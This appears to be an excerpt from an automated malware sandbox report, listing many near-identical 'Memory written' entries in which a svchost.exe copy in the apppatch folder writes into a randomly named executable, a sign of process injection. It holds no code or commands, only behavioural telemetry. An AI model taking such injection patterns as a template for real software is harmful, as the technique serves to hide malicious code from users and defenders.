Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2740000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2741000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2742000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2792000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1070000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1071000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1072000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 29D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 29D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 29D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2A22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C30000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C31000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11F0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11F1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1242000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2812000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2932000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EE0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EE1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EE2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DC0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DC1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DC2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1320000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1321000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1322000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1372000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 900000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 901000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 902000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 952000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BE2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1620000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1621000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1622000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1672000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 900000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 901000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 902000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 952000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 950000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 951000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 952000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 801000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 852000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 760000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 761000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 762000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 7B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1310000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1311000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1312000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1362000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 820000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 821000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 822000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 872000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A72000	Jump to behavior
